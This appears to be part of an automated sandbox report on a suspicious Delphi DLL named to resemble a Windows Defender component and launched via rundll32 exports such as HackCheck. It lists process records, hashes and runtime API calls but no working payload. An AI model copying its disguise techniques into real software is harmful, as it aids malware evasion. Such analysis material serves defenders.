                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",HackCheck
                            Imagebase:0x590000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:high
                            Has exited:true

                            Target ID:13
                            Start time:19:51:52
                            Start date:08/03/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",ServiceCrtMain
                            Imagebase:0x590000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:high
                            Has exited:false

                            Target ID:14
                            Start time:19:51:52
                            Start date:08/03/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",TMethodImplementationIntercept
                            Imagebase:0x590000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:high
                            Has exited:true

                            Target ID:15
                            Start time:19:51:52
                            Start date:08/03/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",dbkFCallWrapperAddr
                            Imagebase:0x590000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:high
                            Has exited:true

                            Target ID:16
                            Start time:19:51:52
                            Start date:08/03/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",__dbk_fcall_wrapper
                            Imagebase:0x590000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:high
                            Has exited:true

                            Target ID:19
                            Start time:19:51:52
                            Start date:08/03/2024
                            Path:C:\Windows\SysWOW64\WerFault.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7540 -s 684
                            Imagebase:0x650000
                            File size:483'680 bytes
                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:20
                            Start time:19:51:52
                            Start date:08/03/2024
                            Path:C:\Windows\SysWOW64\WerFault.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 688
                            Imagebase:0x650000
                            File size:483'680 bytes
                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:22
                            Start time:19:51:55
                            Start date:08/03/2024
                            Path:C:\Windows\SysWOW64\WerFault.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7524 -s 2152
                            Imagebase:0x650000
                            File size:483'680 bytes
                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Reset < >

                              Execution Graph

                              Execution Coverage:2.8%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:16.6%
                              Total number of Nodes:175
                              Total number of Limit Nodes:10
                              execution_graph 9200 4c90898 9203 4a519b8 9200->9203 9202 4c908a8 9204 4a519c3 9203->9204 9207 4a4a6f8 9204->9207 9208 4a4a707 9207->9208 9209 4a4a70c GetCurrentThreadId 9207->9209 9208->9209 9210 4a4a742 9209->9210 9211 4a4aa44 9210->9211 9212 4a4a7b5 9210->9212 9214 4a4aa60 9211->9214 9215 4a4aa71 9211->9215 9226 4a4a68c 9212->9226 9230 4a4a9ac 9214->9230 9217 4a4aa7a GetCurrentThreadId 9215->9217 9220 4a4aa87 9215->9220 9217->9220 9219 4a4aa6a 9219->9215 9221 4a46f7c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 9220->9221 9222 4a4ab17 FreeLibrary 9220->9222 9223 4a4ab3f 9220->9223 9221->9220 9222->9220 9224 4a4ab4e ExitProcess 9223->9224 9225 4a4ab48 9223->9225 9225->9224 9227 4a4a6d4 9226->9227 9228 4a4a69c 9226->9228 9227->9202 9228->9227 9236 4a502f4 GetSystemInfo 9228->9236 9232 4a4a9b6 GetStdHandle WriteFile 9230->9232 9233 4a4aa13 9230->9233 9237 4a4b5b8 9232->9237 9233->9219 9235 4a4aa03 GetStdHandle WriteFile 9235->9219 9236->9228 9238 4a4b5be 9237->9238 9238->9235 9239 4a459b0 9240 4a45c10 9239->9240 9241 4a459c8 9239->9241 9242 4a45d28 9240->9242 9243 4a45bd4 9240->9243 9251 4a459da 9241->9251 9254 4a45a65 Sleep 9241->9254 9244 4a45d31 9242->9244 9245 4a4575c VirtualAlloc 9242->9245 9249 4a45bee Sleep 9243->9249 9255 4a45c2e 9243->9255 9247 4a45797 9245->9247 9248 4a45787 9245->9248 9246 4a459e9 9263 4a45710 9248->9263 9253 4a45c04 Sleep 9249->9253 9249->9255 9251->9246 9252 4a45ac8 9251->9252 9257 4a45aa9 Sleep 9251->9257 9262 4a45ad4 9252->9262 9268 4a45694 9252->9268 9253->9243 9254->9251 9256 4a45a7b Sleep 9254->9256 9258 4a45694 VirtualAlloc 9255->9258 9259 4a45c4c 9255->9259 9256->9241 9257->9252 9261 4a45abf Sleep 9257->9261 9258->9259 9261->9251 9264 4a45758 9263->9264 9265 4a45719 9263->9265 9264->9247 9265->9264 9266 4a45724 Sleep 9265->9266 9266->9264 9267 4a4573e Sleep 9266->9267 9267->9265 9272 4a45628 9268->9272 9270 4a4569d VirtualAlloc 9271 4a456b4 9270->9271 9271->9262 9273 4a455c8 9272->9273 9273->9270 9274 4a4d658 9275 4a4d684 9274->9275 9276 4a4d668 GetModuleFileNameW 9274->9276 9278 4a4e8cc GetModuleFileNameW 9276->9278 9279 4a4e91a 9278->9279 9284 4a4e7a8 9279->9284 9281 4a4e946 9282 4a4e958 LoadLibraryExW 9281->9282 9283 4a4e960 9281->9283 9282->9283 9283->9275 9285 4a4e7c9 9284->9285 9286 4a4e851 9285->9286 9302 4a4e4e4 9285->9302 9286->9281 9288 4a4e83e 9289 4a4e844 9288->9289 9290 4a4e853 GetUserDefaultUILanguage 9288->9290 9291 4a4e610 2 API calls 9289->9291 9306 4a4de94 EnterCriticalSection 9290->9306 9291->9286 9293 4a4e860 9326 4a4e610 9293->9326 9295 4a4e86d 9296 4a4e895 9295->9296 9297 4a4e87b GetSystemDefaultUILanguage 9295->9297 9296->9286 9330 4a4e6dc 9296->9330 9299 4a4de94 17 API calls 9297->9299 9300 4a4e888 9299->9300 9301 4a4e610 2 API calls 9300->9301 9301->9296 9303 4a4e506 9302->9303 9305 4a4e510 9302->9305 9338 4a4e1c8 9303->9338 9305->9288 9307 4a4dee0 LeaveCriticalSection 9306->9307 9308 4a4dec0 9306->9308 9375 4a4ad14 9307->9375 9311 4a4ded1 LeaveCriticalSection 9308->9311 9310 4a4def1 IsValidLocale 9312 4a4df00 9310->9312 9313 4a4df4f EnterCriticalSection 9310->9313 9321 4a4df82 9311->9321 9315 4a4df14 9312->9315 9316 4a4df09 9312->9316 9314 4a4df67 9313->9314 9322 4a4df78 LeaveCriticalSection 9314->9322 9390 4a4db7c 9315->9390 9377 4a4dd78 GetThreadUILanguage 9316->9377 9319 4a4df12 9319->9313 9320 4a4df1d GetSystemDefaultUILanguage 9320->9313 9323 4a4df27 9320->9323 9321->9293 9322->9321 9324 4a4df38 GetSystemDefaultUILanguage 9323->9324 9325 4a4db7c 3 API calls 9324->9325 9325->9319 9328 4a4e62e 9326->9328 9327 4a4e6a9 9327->9295 9328->9327 9399 4a4e5a4 9328->9399 9404 4a4adf8 9330->9404 9333 4a4e72c 9334 4a4e5a4 2 API calls 9333->9334 9335 4a4e740 9334->9335 9336 4a4e5a4 2 API calls 9335->9336 9337 4a4e76e 9335->9337 9336->9337 9337->9286 9339 4a4e1df 9338->9339 9340 4a4e1f3 GetModuleFileNameW 9339->9340 9341 4a4e208 9339->9341 9340->9341 9342 4a4e230 RegOpenKeyExW 9341->9342 9349 4a4e3d7 9341->9349 9343 4a4e257 RegOpenKeyExW 9342->9343 9344 4a4e2f1 9342->9344 9343->9344 9345 4a4e275 RegOpenKeyExW 9343->9345 9359 4a4dfd8 GetModuleHandleW 9344->9359 9345->9344 9347 4a4e293 RegOpenKeyExW 9345->9347 9347->9344 9350 4a4e2b1 RegOpenKeyExW 9347->9350 9348 4a4e30f RegQueryValueExW 9351 4a4e360 RegQueryValueExW 9348->9351 9353 4a4e32d 9348->9353 9349->9305 9350->9344 9352 4a4e2cf RegOpenKeyExW 9350->9352 9354 4a4e37c 9351->9354 9358 4a4e35e 9351->9358 9352->9344 9352->9349 9355 4a4e335 RegQueryValueExW 9353->9355 9356 4a4e384 RegQueryValueExW 9354->9356 9355->9358 9356->9358 9357 4a4e3c6 RegCloseKey 9357->9305 9358->9357 9360 4a4e000 GetProcAddress 9359->9360 9361 4a4e011 9359->9361 9360->9361 9362 4a4e027 9361->9362 9367 4a4e073 9361->9367 9371 4a4dfb4 9361->9371 9362->9348 9365 4a4dfb4 CharNextW 9365->9367 9366 4a4dfb4 CharNextW 9366->9367 9367->9362 9367->9366 9368 4a4e0f8 FindFirstFileW 9367->9368 9370 4a4e162 lstrlenW 9367->9370 9368->9362 9369 4a4e114 FindClose lstrlenW 9368->9369 9369->9362 9369->9367 9370->9367 9372 4a4dfc2 9371->9372 9373 4a4dfd0 9372->9373 9374 4a4dfba CharNextW 9372->9374 9373->9362 9373->9365 9374->9372 9376 4a4ad1a 9375->9376 9376->9310 9378 4a4dd94 9377->9378 9379 4a4dded 9377->9379 9395 4a4dd34 GetThreadPreferredUILanguages 9378->9395 9380 4a4dd34 2 API calls 9379->9380 9385 4a4ddf5 9380->9385 9383 4a4de3c SetThreadPreferredUILanguages 9386 4a4dd34 2 API calls 9383->9386 9385->9383 9389 4a4de7d 9385->9389 9387 4a4de52 9386->9387 9388 4a4de6d SetThreadPreferredUILanguages 9387->9388 9387->9389 9388->9389 9389->9319 9393 4a4dbb7 9390->9393 9391 4a4dc20 IsValidLocale 9392 4a4dc33 GetLocaleInfoW GetLocaleInfoW 9391->9392 9394 4a4dc6e 9391->9394 9392->9394 9393->9391 9393->9394 9394->9320 9396 4a4dd55 9395->9396 9397 4a4dd6e SetThreadPreferredUILanguages 9395->9397 9398 4a4dd5e GetThreadPreferredUILanguages 9396->9398 9397->9379 9398->9397 9400 4a4e5b9 9399->9400 9401 4a4e5d6 FindFirstFileW 9400->9401 9402 4a4e5e6 FindClose 9401->9402 9403 4a4e5ec 9401->9403 9402->9403 9403->9328 9405 4a4adfc GetUserDefaultUILanguage GetLocaleInfoW 9404->9405 9405->9333

                              Control-flow Graph

                              APIs
                              • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,04A4E79C,?,?), ref: 04A4E70E
                              • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,04A4E79C,?,?), ref: 04A4E717
                                • Part of subcall function 04A4E5A4: FindFirstFileW.KERNEL32(00000000,?,00000000,04A4E602,?,00000001), ref: 04A4E5D7
                                • Part of subcall function 04A4E5A4: FindClose.KERNEL32(00000000,00000000,?,00000000,04A4E602,?,00000001), ref: 04A4E5E7
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                              • String ID:
                              • API String ID: 3216391948-0
                              • Opcode ID: 65e097b1686771f4ca6441b9059147865e6fa5f12e75d591cc6b100311400216
                              • Instruction ID: 1da4cad40f227620d3ca5e77bec1f726b96cf1c585165b77993bc8225a43316f
                              • Opcode Fuzzy Hash: 65e097b1686771f4ca6441b9059147865e6fa5f12e75d591cc6b100311400216
                              • Instruction Fuzzy Hash: 3D1154B4A00209AFEB04EFE8DA91AAFB7B8FFC4304F504475E504A7251D774BF058A61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • FindFirstFileW.KERNEL32(00000000,?,00000000,04A4E602,?,00000001), ref: 04A4E5D7
                              • FindClose.KERNEL32(00000000,00000000,?,00000000,04A4E602,?,00000001), ref: 04A4E5E7
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: Find$CloseFileFirst
                              • String ID:
                              • API String ID: 2295610775-0
                              • Opcode ID: 4cb1a6c17b211ee286f755e7f3cef3377a9aa16d882106b9ba3c6140b5414f7a
                              • Instruction ID: bb4d80db87cc94ac956d3c113637140c1a3ab49e53f619aff1395b22cd9149fa
                              • Opcode Fuzzy Hash: 4cb1a6c17b211ee286f755e7f3cef3377a9aa16d882106b9ba3c6140b5414f7a
                              • Instruction Fuzzy Hash: 52F0BE70954614BFE750FB78CE1294EB7ACFBC8714BA004B0E800D2150E734BF009924
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 232 4a502f4-4a50304 GetSystemInfo
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: InfoSystem
                              • String ID:
                              • API String ID: 31276548-0
                              • Opcode ID: cfabf06fd0a7d5aa08c154ff74241a738d374e25dc305ab9149cadf724005ebe
                              • Instruction ID: d29e2bac0d1b06a7855ecf9c405b9c905edc3049983cbb969d7033e4c5802e57
                              • Opcode Fuzzy Hash: cfabf06fd0a7d5aa08c154ff74241a738d374e25dc305ab9149cadf724005ebe
                              • Instruction Fuzzy Hash: C1A012508084005BC804E7584D4240F31801AC0114FC40210645C99691E605996806D7
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,04A4E3ED,?,?), ref: 04A4E201
                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,04A4E3ED,?,?), ref: 04A4E24A
                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,04A4E3ED,?,?), ref: 04A4E26C
                              • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 04A4E28A
                              • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 04A4E2A8
                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 04A4E2C6
                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 04A4E2E4
                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,04A4E3D0,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,04A4E3ED), ref: 04A4E324
                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,04A4E3D0,?,80000001), ref: 04A4E34F
                              • RegCloseKey.ADVAPI32(?,04A4E3D7,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,04A4E3D0,?,80000001,Software\Embarcadero\Locales), ref: 04A4E3CA
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: Open$QueryValue$CloseFileModuleName
                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                              • API String ID: 2701450724-3496071916
                              • Opcode ID: 79e411f823a036c4501a707a4a7008af06393107fe76b5808695ab605b1757d9
                              • Instruction ID: fb5cb02df72bba74f9d222919c0e974ae0cc30f96e796bafa198a361a3c0fe1b
                              • Opcode Fuzzy Hash: 79e411f823a036c4501a707a4a7008af06393107fe76b5808695ab605b1757d9
                              • Instruction Fuzzy Hash: D851BE75A4020CBFEB21DBA4CD41FEF77A8FBC8704F504465BA14FA581D6B0BA409A65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • EnterCriticalSection.KERNEL32(04C9CC14,00000000,04A4DF98,?,?,?,00000000,?,04A4E860,00000000,04A4E8BF,?,?,00000000,00000000,00000000), ref: 04A4DEB2
                              • LeaveCriticalSection.KERNEL32(04C9CC14,04C9CC14,00000000,04A4DF98,?,?,?,00000000,?,04A4E860,00000000,04A4E8BF,?,?,00000000,00000000), ref: 04A4DED6
                              • LeaveCriticalSection.KERNEL32(04C9CC14,04C9CC14,00000000,04A4DF98,?,?,?,00000000,?,04A4E860,00000000,04A4E8BF,?,?,00000000,00000000), ref: 04A4DEE5
                              • IsValidLocale.KERNEL32(00000000,00000002,04C9CC14,04C9CC14,00000000,04A4DF98,?,?,?,00000000,?,04A4E860,00000000,04A4E8BF), ref: 04A4DEF7
                              • EnterCriticalSection.KERNEL32(04C9CC14,00000000,00000002,04C9CC14,04C9CC14,00000000,04A4DF98,?,?,?,00000000,?,04A4E860,00000000,04A4E8BF), ref: 04A4DF54
                              • LeaveCriticalSection.KERNEL32(04C9CC14,04C9CC14,00000000,00000002,04C9CC14,04C9CC14,00000000,04A4DF98,?,?,?,00000000,?,04A4E860,00000000,04A4E8BF), ref: 04A4DF7D
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464012717.0000000004C98000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464032316.0000000004C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464051226.0000000004CA3000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464067136.0000000004CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2464094727.0000000004CA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                              Similarity
                              • API ID: CriticalSection$Leave$Enter$LocaleValid
                              • String ID: en-GB,en,en-US,
                              • API String ID: 975949045-3021119265
                              • Opcode ID: ff3519f044d67b8d42054873f84bebe804e01de7926664eb72f374a44be1c99c
                              • Instruction ID: e541c1b46b944f59fbf0ce75dc8cf046e0e40e6a59efbcf67517e26faf3fe535
                              • Opcode Fuzzy Hash: ff3519f044d67b8d42054873f84bebe804e01de7926664eb72f374a44be1c99c
                              • Instruction Fuzzy Hash: 9D217F70B40641BBFB21B7B98E0572D29D69FC5B49FA04575B100A7280DEA4FD4187B2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 67 4a4a6f8-4a4a705 68 4a4a707 67->68 69 4a4a70c-4a4a740 GetCurrentThreadId 67->69 68->69 70 4a4a744-4a4a770 call 4a4a5dc 69->70 71 4a4a742 69->71 74 4a4a772-4a4a774 70->74 75 4a4a779-4a4a780 70->75 71->70 74->75 76 4a4a776 74->76 77 4a4a782-4a4a785 75->77 78 4a4a78a-4a4a790 75->78 76->75 77->78 79 4a4a795-4a4a79c 78->79 80 4a4a792 78->80 81 4a4a79e-4a4a7a5 79->81 82 4a4a7ab-4a4a7af 79->82 80->79 81->82 83 4a4aa44-4a4aa5e 82->83 84 4a4a7b5 call 4a4a68c 82->84 86 4a4aa60-4a4aa6c call 4a4a924 call 4a4a9ac 83->86 87 4a4aa71-4a4aa78 83->87 88 4a4a7ba 84->88 86->87 90 4a4aa7a-4a4aa85 GetCurrentThreadId 87->90 91 4a4aa9b-4a4aa9f 87->91 90->91 95 4a4aa87-4a4aa96 call 4a4a5fc call 4a4a980 90->95 92 4a4aaa1-4a4aaa5 91->92 93 4a4aab9-4a4aabd 91->93 92->93 96 4a4aaa7-4a4aab7 92->96 97 4a4aabf-4a4aac2 93->97 98 4a4aac9-4a4aacd 93->98 95->91 96->93 97->98 101 4a4aac4-4a4aac6 97->101 102 4a4aaec-4a4aaf5 call 4a4a624 98->102 103 4a4aacf-4a4aad8 call 4a46f7c 98->103 101->98 112 4a4aaf7-4a4aafa 102->112 113 4a4aafc-4a4ab01 102->113 103->102 114 4a4aada-4a4aaea call 4a48ea8 call 4a46f7c 103->114 112->113 115 4a4ab1d-4a4ab28 call 4a4a5fc 112->115 113->115 116 4a4ab03-4a4ab11 call 4a4eaec 113->116 114->102 125 4a4ab2d-4a4ab31 115->125 126 4a4ab2a 115->126 116->115 124 4a4ab13-4a4ab15 116->124 124->115 130 4a4ab17-4a4ab18 FreeLibrary 124->130 128 4a4ab33-4a4ab35 call 4a4a980 125->128 129 4a4ab3a-4a4ab3d 125->129 126->125 128->129 132 4a4ab56-4a4ab67 129->132 133 4a4ab3f-4a4ab46 129->133 130->115 132->93 134 4a4ab4e-4a4ab51 ExitProcess 133->134 135 4a4ab48 133->135 135->134
                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 04A4A72F
                              Memory Dump Source
                              • Source File: 00000004.00000002.2463756119.0000000004A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 04A40000, based on PE: true
                              • Associated: 00000004.00000002.2463740308.0000000004A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463756119.0000000004A5C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463938562.0000000004C91000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463957103.0000000004C92000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463973425.0000000004C93000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000004.00000002.2463995030.0000000004C97000.00000008.00000001.01000000.00000003.sdmpDownload File
